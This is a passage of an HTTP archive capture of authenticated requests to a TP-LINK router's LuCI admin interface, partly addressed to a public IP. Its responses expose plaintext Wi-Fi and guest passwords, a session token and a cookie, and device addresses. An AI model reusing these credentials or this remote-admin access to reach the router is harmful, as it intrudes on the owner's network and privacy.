\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 282,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.659+03:00\",\r\n \"time\": 1832,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": 
\"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 275,\r\n \"dns\": 250,\r\n \"connect\": 526,\r\n \"send\": 0,\r\n \"wait\": 773,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.643+03:00\",\r\n \"time\": 978,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": 
\"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": 
\"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"gu
est_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\
"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\"
:\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guet_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 36\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.647+03:00\",\r\n \"time\": 1794,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n 
},\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 754,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n 
\"startedDateTime\": \"2018-07-17T13:10:19.647+03:00\",\r\n \"time\": 994,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": 
\"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_
snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\"
:\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\